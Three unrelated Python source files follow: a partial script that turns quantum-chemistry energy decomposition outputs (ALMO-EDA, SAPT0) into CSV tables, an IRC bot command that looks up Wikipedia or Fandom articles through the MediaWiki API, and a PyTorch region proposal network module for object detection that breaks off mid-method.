            # tokens 6/7 are method/basis -- TODO confirm for all batches
            snapnum = int(stub_tokens[1])
            snapnums.add(snapnum)
            method = stub_tokens[6] + '_' + stub_tokens[7]
            cp_flag = stub_tokens[-1]
            is_cp = map_is_cp[cp_flag]
            if method not in almo_data:
                almo_data[method] = dict()
            if cp_flag not in almo_data[method]:
                almo_data[method][cp_flag] = dict()
            almo_data_snap = read_qchem_eda_v1(filename, is_cp=is_cp)
            almo_data[method][cp_flag][snapnum] = almo_data_snap
    snapnums = sorted(snapnums)
    # NOTE(review): `weights` appears unused below (only weights_sapt is
    # used for the averages)
    weights = [BIN_TO_WEIGHT_MAP[snapnum_to_bin_map[snapnum]]
               for snapnum in snapnums]
    ## Start by writing all the ALMO data to a CSV file.
    csvfh = open('data_almo.csv', 'w')
    csvwriter = csv.writer(csvfh)
    header_not_data = [
        'snapnum',
        'qc_method',
        # 'bsse_corr',
    ]
    header = [
        'frz',
        'pol',
        # 'del_rs',
        # 'bsse_rs',
        # 'ct_rs',
        'del_scf',
        'bsse_scf',
        'ct_scf',
        'tot_scf',
        'ho_scf',
    ]
    total_header = header_not_data + header
    csvwriter.writerow(total_header)
    # Write only the CP-corrected values.
    for method_basis_pair in method_basis_outer_product:
        qc_method = '_'.join(method_basis_pair)
        if qc_method in almo_data:
            for snapnum in sorted(almo_data[qc_method]['cp']):
                row = [almo_data[qc_method]['cp'][snapnum][column_title]
                       for column_title in header]
                row = [snapnum, qc_method] + row
                csvwriter.writerow(row)
    csvfh.close()
    ##########
    # Parse the SAPT0 outputs; every SAPT snapshot must also have ALMO data
    sapt_data = dict()
    snapnums_sapt = set()
    for filename in filenames_sapt:
        stub = os.path.splitext(os.path.basename(filename))[0]
        print(stub)
        stub_tokens = stub.split('_')
        snapnum = int(stub_tokens[1])
        assert snapnum in snapnums
        snapnums_sapt.add(snapnum)
        sapt_data_snap = read_psi4_sapt0_with_snapnum_and_weight(filename)
        sapt_data[snapnum] = sapt_data_snap
    snapnums_sapt = sorted(snapnums_sapt)
    weights_sapt = [BIN_TO_WEIGHT_MAP[snapnum_to_bin_map[snapnum]]
                    for snapnum in snapnums_sapt]
    # Combined CSV: CP-corrected ALMO components for every method/basis
    # plus the SAPT0 decomposition, one row per snapshot
    csvfh = open('data_all.csv', 'w')
    csvwriter = csv.writer(csvfh)
    # 41 fields: snapnum + 8 ALMO (method, basis) combos x 4 components + 8 SAPT terms
    header = (
        'snapnum',
        'ALMO/wB97M-V/cc-pVTZ E_frz',
        'ALMO/wB97M-V/cc-pVTZ E_pol',
        'ALMO/wB97M-V/cc-pVTZ E_del (SCF)',
        'ALMO/wB97M-V/cc-pVTZ E_CT (SCF)',
        'ALMO/wB97X-D/cc-pVTZ E_frz',
        'ALMO/wB97X-D/cc-pVTZ E_pol',
        'ALMO/wB97X-D/cc-pVTZ E_del (SCF)',
        'ALMO/wB97X-D/cc-pVTZ E_CT (SCF)',
        'ALMO/wB97M-V/6-31G(d,p) E_frz',
        'ALMO/wB97M-V/6-31G(d,p) E_pol',
        'ALMO/wB97M-V/6-31G(d,p) E_del (SCF)',
        'ALMO/wB97M-V/6-31G(d,p) E_CT (SCF)',
        'ALMO/wB97X-D/6-31G(d,p) E_frz',
        'ALMO/wB97X-D/6-31G(d,p) E_pol',
        'ALMO/wB97X-D/6-31G(d,p) E_del (SCF)',
        'ALMO/wB97X-D/6-31G(d,p) E_CT (SCF)',
        'ALMO/B3LYP-D2/6-31G(d,p) E_frz',
        'ALMO/B3LYP-D2/6-31G(d,p) E_pol',
        'ALMO/B3LYP-D2/6-31G(d,p) E_del (SCF)',
        'ALMO/B3LYP-D2/6-31G(d,p) E_CT (SCF)',
        'ALMO/B3LYP-D3/6-31G(d,p) E_frz',
        'ALMO/B3LYP-D3/6-31G(d,p) E_pol',
        'ALMO/B3LYP-D3/6-31G(d,p) E_del (SCF)',
        'ALMO/B3LYP-D3/6-31G(d,p) E_CT (SCF)',
        'ALMO/B3LYP/6-31G(d,p) E_frz',
        'ALMO/B3LYP/6-31G(d,p) E_pol',
        'ALMO/B3LYP/6-31G(d,p) E_del (SCF)',
        'ALMO/B3LYP/6-31G(d,p) E_CT (SCF)',
        'ALMO/HF/6-31G(d,p) E_frz',
        'ALMO/HF/6-31G(d,p) E_pol',
        'ALMO/HF/6-31G(d,p) E_del (SCF)',
        'ALMO/HF/6-31G(d,p) E_CT (SCF)',
        'SAPT/6-31G(d,p)/DCBS E_el',
        'SAPT/6-31G(d,p)/DCBS E_exch',
        'SAPT/6-31G(d,p)/DCBS E_ind',
        'SAPT/6-31G(d,p)/DCBS E_ind-exch',
        'SAPT/6-31G(d,p)/DCBS E_ind_HO',
        'SAPT/6-31G(d,p)/DCBS E_disp',
        'SAPT/6-31G(d,p)/DCBS E_disp-exch',
        'SAPT/6-31G(d,p)/DCBS E_CT',
    )
    csvwriter.writerow(header)
    rows = []
    for snapnum in snapnums_sapt:
        line = [
            snapnum,
            almo_data['wb97m-v_cc-pvtz']['cp'][snapnum]['frz'],
            almo_data['wb97m-v_cc-pvtz']['cp'][snapnum]['pol'],
            almo_data['wb97m-v_cc-pvtz']['cp'][snapnum]['del_scf'],
            almo_data['wb97m-v_cc-pvtz']['cp'][snapnum]['ct_scf'],
            almo_data['wb97x-d_cc-pvtz']['cp'][snapnum]['frz'],
            almo_data['wb97x-d_cc-pvtz']['cp'][snapnum]['pol'],
            almo_data['wb97x-d_cc-pvtz']['cp'][snapnum]['del_scf'],
            almo_data['wb97x-d_cc-pvtz']['cp'][snapnum]['ct_scf'],
            almo_data['wb97m-v_6-31gss']['cp'][snapnum]['frz'],
            almo_data['wb97m-v_6-31gss']['cp'][snapnum]['pol'],
            almo_data['wb97m-v_6-31gss']['cp'][snapnum]['del_scf'],
            almo_data['wb97m-v_6-31gss']['cp'][snapnum]['ct_scf'],
            almo_data['wb97x-d_6-31gss']['cp'][snapnum]['frz'],
            almo_data['wb97x-d_6-31gss']['cp'][snapnum]['pol'],
            almo_data['wb97x-d_6-31gss']['cp'][snapnum]['del_scf'],
            almo_data['wb97x-d_6-31gss']['cp'][snapnum]['ct_scf'],
            almo_data['b3lyp-d2_6-31gss']['cp'][snapnum]['frz'],
            almo_data['b3lyp-d2_6-31gss']['cp'][snapnum]['pol'],
            almo_data['b3lyp-d2_6-31gss']['cp'][snapnum]['del_scf'],
            almo_data['b3lyp-d2_6-31gss']['cp'][snapnum]['ct_scf'],
            almo_data['b3lyp-d3_6-31gss']['cp'][snapnum]['frz'],
            almo_data['b3lyp-d3_6-31gss']['cp'][snapnum]['pol'],
            almo_data['b3lyp-d3_6-31gss']['cp'][snapnum]['del_scf'],
            almo_data['b3lyp-d3_6-31gss']['cp'][snapnum]['ct_scf'],
            almo_data['b3lyp_6-31gss']['cp'][snapnum]['frz'],
            almo_data['b3lyp_6-31gss']['cp'][snapnum]['pol'],
            almo_data['b3lyp_6-31gss']['cp'][snapnum]['del_scf'],
            almo_data['b3lyp_6-31gss']['cp'][snapnum]['ct_scf'],
            almo_data['hf_6-31gss']['cp'][snapnum]['frz'],
            almo_data['hf_6-31gss']['cp'][snapnum]['pol'],
            almo_data['hf_6-31gss']['cp'][snapnum]['del_scf'],
            almo_data['hf_6-31gss']['cp'][snapnum]['ct_scf'],
            sapt_data[snapnum]['dimer']['el'],
            sapt_data[snapnum]['dimer']['exch'],
            sapt_data[snapnum]['dimer']['ind'],
            sapt_data[snapnum]['dimer']['exch-ind'],
            sapt_data[snapnum]['dimer']['ind_HO'],
            sapt_data[snapnum]['dimer']['disp'],
            sapt_data[snapnum]['dimer']['exch-disp'],
            sapt_data[snapnum]['ct'],
        ]
        rows.append(line)
        csvwriter.writerow(line)
    # Append weighted/unweighted column averages (skipping the snapnum column)
    start = 1
    vals = np.array(rows, dtype=float)[:, start:]
    average_unweighted = np.average(vals, axis=0, weights=None)
    average_weighted = np.average(vals, axis=0, weights=weights_sapt)
    csvwriter.writerow(['average (unweighted)'] + average_unweighted.tolist())
    csvwriter.writerow(['average (weighted)'] + average_weighted.tolist())
    csvfh.close()
# ##########
# almo_data_paper1 = dict()
# csvfh = open('almo_eda_paper1_all.csv', 'w')
# csvwriter = csv.writer(csvfh)
# # 5 fields
# header = (
# 'system',
# 'ALMO/B3LYP E_frz',
# 'ALMO/B3LYP E_pol',
# 'ALMO/B3LYP E_del (SCF)',
# 'ALMO/B3LYP E_CT (SCF)',
# )
# csvwriter.writerow(header)
# for filename in filenames_paper1:
# stub = os.path.splitext(os.path.basename(filename))[0]
# stub_tokens = stub.split('_')
# system = '_'.join(stub_tokens[1:])
# almo_data_system = read_qchem_eda(filename, is_cp=True)
# line = [
# system,
# almo_data_system['frz'],
# almo_data_system['pol'],
# almo_data_system['del_scf'],
# almo_data_system['ct_scf'],
# ]
# csvwriter.writerow(line)
# csvfh.close()
|
<reponame>Didero/DideRobot<filename>commands/MediaWikiLookup.py
import re
import requests
from CommandTemplate import CommandTemplate
from IrcMessage import IrcMessage
from CommandException import CommandException, CommandInputException
import Constants
class Command(CommandTemplate):
	"""Looks up the best-matching or a random article on Wikipedia or on a Fandom.com wiki via the MediaWiki API."""

	# 'Fandom.com' used to be called 'Wikia.com', support both the old and the new name
	triggers = ['wikipedia', 'wikipediarandom', 'fandom', 'fandomrandom', 'wikia', 'wikiarandom']
	# Fixed: the concatenation was missing the sentence separator before "'wikia'",
	# which made the help text read "...from that wiki'wikia' instead of...".
	helptext = "Searches Wikipedia or a wiki on Fandom.com for the best-matching article. " \
			   "Usage: '{commandPrefix}wikipedia [searchquery]' or {commandPrefix}fandom [wiki-name] [searchquery]'. " \
			   "Or use '{commandPrefix}wikipediarandom' or '{commandPrefix}fandomrandom [wiki-name]' to get a random article from that wiki. " \
			   "'wikia' instead of 'fandom' is also supported because Fandom used to be called Wikia"

	def execute(self, message):
		"""
		Look up an article (best match or random) and reply with its first section plus a link.

		:type message: IrcMessage
		:raises CommandException: when the wiki doesn't respond (in time) or returns invalid data
		:raises CommandInputException: when the wiki or the requested article doesn't exist
		"""
		if message.trigger == 'wikipedia' or message.trigger == 'wikipediarandom':
			wikiDisplayName = 'Wikipedia'
			wikiApiUrl = "https://en.wikipedia.org/w/api.php"
			searchQuery = message.message
		elif message.messagePartsLength == 0:
			return message.reply("Please tell me which Fandom wiki you want me to use, there's a LOT of them. Turns out humans write a lot of stories!", "say")
		else:
			wikiDisplayName = "the {} Fandom wiki".format(message.messageParts[0])
			wikiApiUrl = "https://{}.fandom.com/api.php".format(message.messageParts[0])
			searchQuery = u" ".join(message.messageParts[1:])
		shouldPickRandomPage = message.trigger.endswith('random')
		# Searches need a search term
		if not shouldPickRandomPage and not searchQuery:
			return message.reply("What do you want me to search for? Or if you don't know what you want, use the '{}random' command and be surprised!".format(message.trigger), "say")
		# We want 1200 characters because that's the maximum allowed, and because we don't know how much we have to chop off because they're preceding images
		# We also want the sectionformat to be 'wiki' so we can see where the intro paragraph ends (We can't use 'exintro' for this because images can come first so we'd only get their caption)
		requestParams = {'format': 'json', 'utf8': True, 'redirects': True, 'action': 'query', 'prop': 'extracts|info',
						 'exchars': 1200, 'exlimit': 1, 'explaintext': True, 'exsectionformat': 'wiki', 'inprop': 'url'}
		# Namespace: 0 means that it only looks at 'actual' articles, and ignores meta pages, user pages, and the like
		if shouldPickRandomPage:
			requestParams['generator'] = 'random'
			requestParams['grnnamespace'] = 0
		else:
			requestParams['generator'] = 'search'
			requestParams['gsrnamespace'] = 0
			requestParams['gsrlimit'] = 1
			requestParams['gsrsearch'] = searchQuery
		try:
			apiResult = requests.get(wikiApiUrl, params=requestParams, timeout=10.0)
		except requests.exceptions.Timeout:
			raise CommandException("{} took too long to respond. Maybe try again in a little while?".format(wikiDisplayName))
		if apiResult.status_code == 404:
			# Should only happen for Fandom searches and a non-existent wiki
			raise CommandInputException("{} doesn't appear to exist. Maybe you made a typo? Or maybe you made a whole new fandom!".format(wikiDisplayName))
		if apiResult.status_code != 200:
			self.logError(u"[MediaWiki] {} returned an unexpected result for commandtrigger '{}' and query '{}'. Status code is {}, response is {}".format(wikiApiUrl, message.trigger, searchQuery, apiResult.status_code, apiResult.text))
			raise CommandException("Uh oh, something went wrong with retrieving data from {}. Either they're having issues, or I am. If this keeps happening, please tell my owner(s) to look into this!".format(wikiDisplayName))
		try:
			apiData = apiResult.json()
		except ValueError:
			self.logError(u"[MediaWiki] Invalid JSON reply from API. Wiki url is {}, query was '{}', response is {}".format(wikiApiUrl, searchQuery, apiResult.text))
			raise CommandException("Hmm, the data that {} returned isn't exactly what I expected, I'm not sure what to do with this. If this keeps happening, please tell my owner(s) about this!".format(wikiDisplayName))
		if 'query' not in apiData or 'pages' not in apiData['query'] or "-1" in apiData['query']['pages']:
			raise CommandInputException("Seems like {} doesn't have any information on '{}'. Either you made a typo, or you know more about this than all the wiki editors combined!".format(wikiDisplayName, searchQuery))
		# Get the article text, and clean it up a bit
		articleData = apiData['query']['pages'].popitem()[1]
		articleText = articleData["extract"]
		articleUrl = articleData["canonicalurl"]
		# If we got more text than just from the first section, it's got newlines and a header indicator (multiple '='s in MediaWiki formatting). Only get the first section
		# (raw strings so the regex escapes aren't interpreted by Python first)
		if u'\n=' in articleText:
			articleText = re.split(r'\n+=+', articleText, maxsplit=1)[0]
		# Some articles put images and captions at the start of the article, separated by tabs, so we have to remove those
		if u'\t' in articleText:
			articleText = articleText.rsplit(u'\t', 1)[1].strip()
		# Replace any remaining newlines with spaces
		if u'\n' in articleText:
			articleText = re.sub(r'\s*\n+\s*', ' ', articleText)
		# Limit the article text length to a single IRC message
		maxArticleTextLength = Constants.MAX_MESSAGE_LENGTH - len(Constants.GREY_SEPARATOR) - len(articleUrl)
		if len(articleText) > maxArticleTextLength:
			articleText = articleText[:maxArticleTextLength - 5] + u"[...]"
		message.reply(articleText + Constants.GREY_SEPARATOR + articleUrl)
|
<filename>modules/RPN.py
'''
Function:
region proposal net
Author:
Charles
'''
import torch
import numpy as np
import torch.nn as nn
import torch.nn.functional as F
from modules.utils import *
from modules.losses import *
from libs.nms.nms_wrapper import nms
'''
Function:
define the proposal layer for rpn
Init Input:
--feature_stride: stride now.
--anchor_scales: scales for anchor boxes.
--anchor_ratios: ratios for anchor boxes.
--mode: flag about TRAIN or TEST.
--cfg: config file.
Forward Input:
--x_cls_pred/probs: N x 2 x H x W
--x_reg_pred: N x 4 x H x W
--img_info: (height, width, scale_factor)
'''
class rpnProposalLayer(nn.Module):
    '''Turn RPN objectness scores and box deltas into a fixed-size set of RoIs per image via NMS.'''
    def __init__(self, feature_stride, anchor_scales, anchor_ratios, mode, cfg, **kwargs):
        super(rpnProposalLayer, self).__init__()
        # stride of the backbone feature map relative to the input image
        self.feature_stride = feature_stride
        # base anchors, shape (num_anchors, 4) in (x1, y1, x2, y2) format
        self.anchors = RegionProposalNet.generateAnchors(scales=anchor_scales, ratios=anchor_ratios)
        self.num_anchors = self.anchors.size(0)
        # NMS budgets and threshold differ between training and testing
        if mode == 'TRAIN':
            self.pre_nms_topN = cfg.TRAIN_RPN_PRE_NMS_TOP_N
            self.post_nms_topN = cfg.TRAIN_RPN_POST_NMS_TOP_N
            self.nms_thresh = cfg.TRAIN_RPN_NMS_THRESH
        elif mode == 'TEST':
            self.pre_nms_topN = cfg.TEST_RPN_PRE_NMS_TOP_N
            self.post_nms_topN = cfg.TEST_RPN_POST_NMS_TOP_N
            self.nms_thresh = cfg.TEST_RPN_NMS_THRESH
        else:
            raise ValueError('Unkown mode <%s> in rpnProposalLayer...' % mode)
    '''forward'''
    def forward(self, x):
        '''x is a tuple (probs, x_reg_pred, img_info); returns a
        (batch_size, post_nms_topN, 5) tensor where column 0 holds the batch
        index and columns 1:5 the proposal box; unused rows stay zero.'''
        # prepare
        probs, x_reg_pred, img_info = x
        batch_size = probs.size(0)
        feature_height, feature_width = probs.size(2), probs.size(3)
        # get bg and fg probs: first num_anchors channels are background scores
        bg_probs = probs[:, :self.num_anchors, :, :]
        fg_probs = probs[:, self.num_anchors:, :, :]
        # get shift: one (x, y, x, y) offset per feature-map cell, in image coordinates
        shift_x = np.arange(0, feature_width) * self.feature_stride
        shift_y = np.arange(0, feature_height) * self.feature_stride
        shift_x, shift_y = np.meshgrid(shift_x, shift_y)
        shifts = torch.from_numpy(np.vstack((shift_x.ravel(), shift_y.ravel(), shift_x.ravel(), shift_y.ravel())).transpose())
        shifts = shifts.contiguous().type_as(fg_probs).float()
        # get anchors: tile the base anchors over every cell, then over the batch
        anchors = self.anchors.type_as(fg_probs)
        anchors = anchors.view(1, self.num_anchors, 4) + shifts.view(shifts.size(0), 1, 4)
        anchors = anchors.view(1, self.num_anchors*shifts.size(0), 4).expand(batch_size, self.num_anchors*shifts.size(0), 4)
        # format x_reg_pred to (batch, num_boxes, 4) so it lines up with the anchors
        bbox_deltas = x_reg_pred.permute(0, 2, 3, 1).contiguous()
        bbox_deltas = bbox_deltas.view(batch_size, -1, 4)
        # format fg_probs to (batch, num_boxes)
        fg_probs = fg_probs.permute(0, 2, 3, 1).contiguous()
        fg_probs = fg_probs.view(batch_size, -1)
        # convert anchors to proposals by applying the predicted deltas
        proposals = BBoxFunctions.anchors2Proposals(anchors, bbox_deltas)
        # clip predicted boxes to image
        proposals = BBoxFunctions.clipBoxes(proposals, img_info)
        # do nms per image, keeping at most post_nms_topN proposals each
        scores = fg_probs
        _, order = torch.sort(scores, 1, True)
        output = scores.new(batch_size, self.post_nms_topN, 5).zero_()
        for i in range(batch_size):
            proposals_single = proposals[i]
            scores_single = scores[i]
            order_single = order[i]
            # NOTE(review): this compares pre_nms_topN against scores.numel()
            # (the whole batch) rather than scores_single.numel() — presumably
            # harmless since pre_nms_topN is much smaller, but worth confirming.
            if self.pre_nms_topN > 0 and self.pre_nms_topN < scores.numel():
                order_single = order_single[:self.pre_nms_topN]
            proposals_single = proposals_single[order_single, :]
            scores_single = scores_single[order_single].view(-1, 1)
            _, keep_idxs = nms(torch.cat((proposals_single, scores_single), 1), self.nms_thresh)
            keep_idxs = keep_idxs.long().view(-1)
            if self.post_nms_topN > 0:
                keep_idxs = keep_idxs[:self.post_nms_topN]
            proposals_single = proposals_single[keep_idxs, :]
            scores_single = scores_single[keep_idxs, :]
            num_proposals = proposals_single.size(0)
            # column 0 carries the batch index; rows beyond num_proposals stay zero-padded
            output[i, :, 0] = i
            output[i, :num_proposals, 1:] = proposals_single
        return output
    def backward(self, *args):
        '''The proposal layer is not differentiable; no gradients flow back.'''
        pass
'''build target layer for rpn'''
class rpnBuildTargetLayer(nn.Module):
    '''Assign per-anchor classification labels and box-regression targets for RPN training.'''
    def __init__(self, feature_stride, anchor_scales, anchor_ratios, mode, cfg, **kwargs):
        super(rpnBuildTargetLayer, self).__init__()
        self.feature_stride = feature_stride
        # base anchors, shape (num_anchors, 4) in (x1, y1, x2, y2) format
        self.anchors = RegionProposalNet.generateAnchors(scales=anchor_scales, ratios=anchor_ratios)
        if mode == 'TRAIN':
            self.rpn_negative_overlap = cfg.TRAIN_RPN_NEGATIVE_OVERLAP
            self.rpn_positive_overlap = cfg.TRAIN_RPN_POSITIVE_OVERLAP
            self.rpn_fg_fraction = cfg.TRAIN_RPN_FG_FRACTION
            self.rpn_batch_size = cfg.TRAIN_RPN_BATCHSIZE
        elif mode == 'TEST':
            self.rpn_negative_overlap = cfg.TEST_RPN_NEGATIVE_OVERLAP
            self.rpn_positive_overlap = cfg.TEST_RPN_POSITIVE_OVERLAP
            self.rpn_fg_fraction = cfg.TEST_RPN_FG_FRACTION
            self.rpn_batch_size = cfg.TEST_RPN_BATCHSIZE
        else:
            raise ValueError('Unkown mode <%s> in rpnBuildTargetLayer...' % mode)
        self.num_anchors = self.anchors.size(0)
        # anchors extending past the image border by more than this many pixels are discarded
        self.allowed_border = 0
    '''forward'''
    def forward(self, x):
        '''x is (x_cls_pred, gt_boxes, img_info, num_gt_boxes); returns
        [labels, bbox_targets, bbox_mask], each reshaped to the feature-map
        layout. Labels: 1 is positive, 0 is negative, -1 means ignore.'''
        # prepare
        x_cls_pred, gt_boxes, img_info, num_gt_boxes = x
        batch_size = gt_boxes.size(0)
        feature_height, feature_width = x_cls_pred.size(2), x_cls_pred.size(3)
        # get shift: per-cell (x, y, x, y) offsets in image coordinates
        shift_x = np.arange(0, feature_width) * self.feature_stride
        shift_y = np.arange(0, feature_height) * self.feature_stride
        shift_x, shift_y = np.meshgrid(shift_x, shift_y)
        shifts = torch.from_numpy(np.vstack((shift_x.ravel(), shift_y.ravel(), shift_x.ravel(), shift_y.ravel())).transpose())
        shifts = shifts.contiguous().type_as(x_cls_pred).float()
        # get anchors tiled over every feature-map cell
        anchors = self.anchors.type_as(gt_boxes)
        anchors = anchors.view(1, self.num_anchors, 4) + shifts.view(shifts.size(0), 1, 4)
        anchors = anchors.view(self.num_anchors*shifts.size(0), 4)
        total_anchors_ori = anchors.size(0)
        # make sure anchors are in the image (img_info rows are (height, width, scale_factor))
        keep_idxs = ((anchors[:, 0] >= -self.allowed_border) &
                     (anchors[:, 1] >= -self.allowed_border) &
                     (anchors[:, 2] < int(img_info[0][1])+self.allowed_border) &
                     (anchors[:, 3] < int(img_info[0][0])+self.allowed_border))
        keep_idxs = torch.nonzero(keep_idxs).view(-1)
        anchors = anchors[keep_idxs, :]
        # prepare labels: 1 is positive, 0 is negative, -1 means ignore
        labels = gt_boxes.new(batch_size, keep_idxs.size(0)).fill_(-1)
        # prepare bbox mask: 0 means ignore, 1 is adopted
        bbox_mask = gt_boxes.new(batch_size, keep_idxs.size(0)).zero_()
        # calc ious between every kept anchor and every ground-truth box
        overlaps = BBoxFunctions.calcIoUs(anchors, gt_boxes)
        max_overlaps, argmax_overlaps = torch.max(overlaps, 2)
        gt_max_overlaps, _ = torch.max(overlaps, 1)
        # assign labels: below the negative threshold -> 0, the best anchor for
        # each gt box -> 1, above the positive threshold -> 1
        labels[max_overlaps < self.rpn_negative_overlap] = 0
        gt_max_overlaps[gt_max_overlaps==0] = 1e-5
        keep_idxs_label = torch.sum(overlaps.eq(gt_max_overlaps.view(batch_size, 1, -1).expand_as(overlaps)), 2)
        if torch.sum(keep_idxs_label) > 0:
            labels[keep_idxs_label > 0] = 1
        labels[max_overlaps >= self.rpn_positive_overlap] = 1
        # subsample so at most rpn_fg_fraction of the RPN minibatch is foreground,
        # and the rest is filled with background anchors
        max_num_fg = int(self.rpn_fg_fraction * self.rpn_batch_size)
        num_fg = torch.sum((labels == 1).int(), 1)
        num_bg = torch.sum((labels == 0).int(), 1)
        for i in range(batch_size):
            if num_fg[i] > max_num_fg:
                fg_idxs = torch.nonzero(labels[i] == 1).view(-1)
                rand_num = torch.from_numpy(np.random.permutation(fg_idxs.size(0))).type_as(gt_boxes).long()
                disable_idxs = fg_idxs[rand_num[:fg_idxs.size(0)-max_num_fg]]
                labels[i][disable_idxs] = -1
            max_num_bg = self.rpn_batch_size - torch.sum((labels == 1).int(), 1)[i]
            if num_bg[i] > max_num_bg:
                bg_idxs = torch.nonzero(labels[i] == 0).view(-1)
                rand_num = torch.from_numpy(np.random.permutation(bg_idxs.size(0))).type_as(gt_boxes).long()
                disable_idxs = bg_idxs[rand_num[:bg_idxs.size(0)-max_num_bg]]
                labels[i][disable_idxs] = -1
        # pick each anchor's best-matching gt box; offsets flatten the batch so a
        # single view(-1, 5) gather works (gt_boxes carries 5 values per box)
        offsets = torch.arange(0, batch_size) * gt_boxes.size(1)
        argmax_overlaps = argmax_overlaps + offsets.view(batch_size, 1).type_as(argmax_overlaps)
        gt_rois = gt_boxes.view(-1, 5)[argmax_overlaps.view(-1), :].view(batch_size, -1, 5)
        bbox_targets = BBoxFunctions.encodeBboxes(anchors, gt_rois[..., :4])
        bbox_mask[labels==1] = 1
        # unmap back to the full anchor set, then reshape to the feature-map layout
        labels = rpnBuildTargetLayer.unmap(labels, total_anchors_ori, keep_idxs, batch_size, fill=-1)
        labels = labels.view(batch_size, feature_height, feature_width, self.num_anchors).permute(0, 3, 1, 2).contiguous()
        labels = labels.view(batch_size, 1, self.num_anchors*feature_height, feature_width)
        bbox_targets = rpnBuildTargetLayer.unmap(bbox_targets, total_anchors_ori, keep_idxs, batch_size, fill=0)
        bbox_targets = bbox_targets.view(batch_size, feature_height, feature_width, self.num_anchors*4).permute(0, 3, 1, 2).contiguous()
        bbox_mask = rpnBuildTargetLayer.unmap(bbox_mask, total_anchors_ori, keep_idxs, batch_size, fill=0)
        bbox_mask = bbox_mask.view(batch_size, total_anchors_ori, 1).expand(batch_size, total_anchors_ori, 4)
        bbox_mask = bbox_mask.contiguous().view(batch_size, feature_height, feature_width, 4*self.num_anchors).permute(0, 3, 1, 2).contiguous()
        # pack return values into outputs
        outputs = [labels, bbox_targets, bbox_mask]
        return outputs
    @staticmethod
    def unmap(data, count, inds, batch_size, fill=0):
        '''Scatter data for the kept anchors back into a tensor covering all
        count anchors, filling the discarded positions with fill.'''
        if data.dim() == 2:
            ret = torch.Tensor(batch_size, count).fill_(fill).type_as(data)
            ret[:, inds] = data
        else:
            ret = torch.Tensor(batch_size, count, data.size(2)).fill_(fill).type_as(data)
            ret[:, inds, :] = data
        return ret
    def backward(self, *args):
        '''Target building is not differentiable; no gradients flow back.'''
        pass
'''region proposal net'''
class RegionProposalNet(nn.Module):
    '''Region proposal network: predicts objectness and box deltas, yields RoIs and (when training) RPN losses.'''
    def __init__(self, in_channels, feature_stride, mode, cfg, **kwargs):
        super(RegionProposalNet, self).__init__()
        # prepare
        self.anchor_scales = cfg.ANCHOR_SCALES
        self.anchor_ratios = cfg.ANCHOR_RATIOS
        self.feature_stride = feature_stride
        self.mode = mode
        self.cfg = cfg
        # define rpn conv: a shared 3x3 conv + ReLU feeding two 1x1 heads
        self.rpn_conv_trans = nn.Sequential(nn.Conv2d(in_channels=in_channels, out_channels=512, kernel_size=3, stride=1, padding=1, bias=True),
                                            nn.ReLU(inplace=True))
        # 2 scores (bg/fg) and 4 box deltas per anchor
        self.out_channels_cls = len(self.anchor_scales) * len(self.anchor_ratios) * 2
        self.out_channels_reg = len(self.anchor_scales) * len(self.anchor_ratios) * 4
        self.rpn_conv_cls = nn.Conv2d(in_channels=512, out_channels=self.out_channels_cls, kernel_size=1, stride=1, padding=0)
        self.rpn_conv_reg = nn.Conv2d(in_channels=512, out_channels=self.out_channels_reg, kernel_size=1, stride=1, padding=0)
        # proposal layer
        self.rpn_proposal_layer = rpnProposalLayer(feature_stride=self.feature_stride, anchor_scales=self.anchor_scales, anchor_ratios=self.anchor_ratios, mode=self.mode, cfg=self.cfg)
        # build target layer
        self.rpn_build_target_layer = rpnBuildTargetLayer(feature_stride=self.feature_stride, anchor_scales=self.anchor_scales, anchor_ratios=self.anchor_ratios, mode=self.mode, cfg=self.cfg)
    '''forward'''
    def forward(self, x, gt_boxes, img_info, num_gt_boxes):
        '''Return (rois, rpn_cls_loss, rpn_reg_loss); the two losses are zero
        tensors outside of training.'''
        batch_size = x.size(0)
        # do base classifiction and regression
        x = self.rpn_conv_trans(x)
        x_cls = self.rpn_conv_cls(x)
        x_reg = self.rpn_conv_reg(x)
        # do softmax over the 2-class (bg/fg) dimension to get probs
        x_cls_reshape = x_cls.view(x_cls.size(0), 2, -1, x_cls.size(3))
        probs = F.softmax(x_cls_reshape, 1)
        probs = probs.view(x_cls.size())
        # get RoIs (the proposal layer only sees detached .data tensors)
        rois = self.rpn_proposal_layer((probs.data, x_reg.data, img_info))
        # define loss
        rpn_cls_loss = torch.Tensor([0]).type_as(x)
        rpn_reg_loss = torch.Tensor([0]).type_as(x)
        # while training, calculate loss
        if self.mode == 'TRAIN' and gt_boxes is not None:
            targets = self.rpn_build_target_layer((x_cls.data, gt_boxes, img_info, num_gt_boxes))
            # --classification loss, only on anchors whose label is not -1 (ignore)
            x_cls_preds = x_cls_reshape.permute(0, 2, 3, 1).contiguous().view(batch_size, -1, 2)
            labels = targets[0].view(batch_size, -1)
            keep_idxs = labels.view(-1).ne(-1).nonzero().view(-1)
            x_cls_preds_keep = torch.index_select(x_cls_preds.view(-1, 2), 0, keep_idxs.data)
            labels_keep = torch.index_select(labels.view(-1), 0, keep_idxs.data)
            labels_keep = labels_keep.long()
            if self.cfg.RPN_CLS_LOSS_SET['type'] == 'cross_entropy':
                rpn_cls_loss = CrossEntropyLoss(preds=x_cls_preds_keep,
                                                targets=labels_keep,
                                                loss_weight=self.cfg.RPN_CLS_LOSS_SET['cross_entropy']['weight'],
                                                size_average=self.cfg.RPN_CLS_LOSS_SET['cross_entropy']['size_average'])
            else:
                raise ValueError('Unkown classification loss type <%s>...' % self.cfg.RPN_CLS_LOSS_SET['type'])
            # --regression loss, only on anchors selected by the bbox mask
            bbox_targets, bbox_mask = targets[1:]
            if self.cfg.RPN_REG_LOSS_SET['type'] == 'betaSmoothL1Loss':
                rpn_reg_loss = betaSmoothL1Loss(x_reg[bbox_mask>0].view(-1, 4),
                                                bbox_targets[bbox_mask>0].view(-1, 4),
                                                beta=self.cfg.RPN_REG_LOSS_SET['betaSmoothL1Loss']['beta'],
                                                size_average=self.cfg.RPN_REG_LOSS_SET['betaSmoothL1Loss']['size_average'],
                                                loss_weight=self.cfg.RPN_REG_LOSS_SET['betaSmoothL1Loss']['weight'])
            else:
                raise ValueError('Unkown regression loss type <%s>...' % self.cfg.RPN_REG_LOSS_SET['type'])
        return rois, rpn_cls_loss, rpn_reg_loss
    '''initialize weights'''
    def initWeights(self, init_method):
        '''Initialize the three conv layers with the chosen scheme
        ('normal', 'kaiming' or 'xavier').'''
        # normal init
        if init_method == 'normal':
            for layer in [self.rpn_conv_trans[0], self.rpn_conv_cls, self.rpn_conv_reg]:
                normalInit(layer, std=0.01)
        # kaiming init
        elif init_method == 'kaiming':
